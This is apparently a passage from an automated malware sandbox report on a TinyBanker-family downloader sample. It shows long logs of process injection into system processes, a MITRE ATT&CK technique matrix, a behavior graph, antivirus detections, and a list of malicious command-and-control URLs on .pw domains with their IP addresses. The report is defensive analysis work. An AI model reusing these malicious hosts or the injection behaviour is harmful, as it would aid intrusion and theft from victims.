            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 10B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2790000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 640000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1040000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2350000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 29B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1190000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 27F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 28D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: B90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 14D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2A30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2960000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 3010000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: BD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DA0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2AE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2130000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 26C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2100000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 24C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1490000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1380000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1310000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2530000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 22F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2ED0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1050000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 980000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 990000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1510000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: java.exe, 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1635935330.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.1634654042.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: winver.exe, 00000002.00000002.2893231988.0000000002C7C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWnd*(d
            Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: winver.exe, 00000002.00000002.2893231988.0000000002C7C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\java.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133477548824988414.txt VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		512
            Process Injection            		3
            Rootkit            		1
            Credential API Hooking            		111
            Security Software Discovery            		Remote Services1
            Credential API Hooking            		Exfiltration Over Other Network Medium21
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/Job1
            DLL Side-Loading            		11
            Registry Run Keys / Startup Folder            		1
            Masquerading            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager3
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication13
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Hidden Files and Directories            		Cached Domain Credentials111
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1366396 Sample: java.exe Startdate: 22/12/2023 Architecture: WINDOWS Score: 100 41 xtbbpqfrsubt.pw 2->41 43 wwgfyvvdtmeq.pw 2->43 45 12 other IPs or domains 2->45 53 Snort IDS alert for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 6 other signatures 2->59 10 java.exe 1 2->10         started        signatures3 process4 signatures5 67 Exploit detected, runtime environment starts unknown processes 10->67 69 Writes to foreign memory regions 10->69 13 winver.exe 1 4 10->13         started        18 conhost.exe 10->18         started        process6 dnsIp7 49 fkmmvfeonnyh.pw 216.218.185.162, 49735, 49737, 49738 HURRICANEUS United States 13->49 51 uyhgqunqkxnx.pw 45.77.249.79, 49736, 80 AS-CHOOPAUS United States 13->51 39 C:\Users\user\AppData\Roaming\...\bin.exe, PE32 13->39 dropped 75 Creates autostart registry keys with suspicious names 13->75 77 Contains functionality to inject threads in other processes 13->77 79 Injects code into the Windows Explorer (explorer.exe) 13->79 81 4 other signatures 13->81 20 explorer.exe 17 8 13->20 injected 23 SearchApp.exe 13 13->23 injected 26 sihost.exe 13->26 injected 28 32 other processes 13->28 file8 signatures9 process10 dnsIp11 61 Contains functionality to inject threads in other processes 20->61 63 Writes to foreign memory regions 20->63 65 Creates a thread in another existing process (thread injection) 20->65 30 bin.exe 1 20->30         started        33 bin.exe 1 20->33         started        47 173.222.162.32, 443, 49729 AKAMAI-ASUS United States 23->47 signatures12 process13 signatures14 71 Antivirus detection for dropped file 30->71 73 Machine Learning detection for dropped file 30->73 35 conhost.exe 30->35         started        37 conhost.exe 33->37         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            java.exe89%ReversingLabsWin32.Downloader.TinyBanker
            java.exe100%AviraHEUR/AGEN.1322420
            java.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\F90F00A9\bin.exe100%AviraHEUR/AGEN.1322420
            C:\Users\user\AppData\Roaming\F90F00A9\bin.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            https://login.windows.local0%URL Reputationsafe
            http://evbsdqvgmpph.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://fccfxejgtpqb.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://xtbbpqfrsubt.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://mfueeimvyrsp.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://assets.activity.windows.comer0%Avira URL Cloudsafe
            https://mths.be/fromcodepoint0%Avira URL Cloudsafe
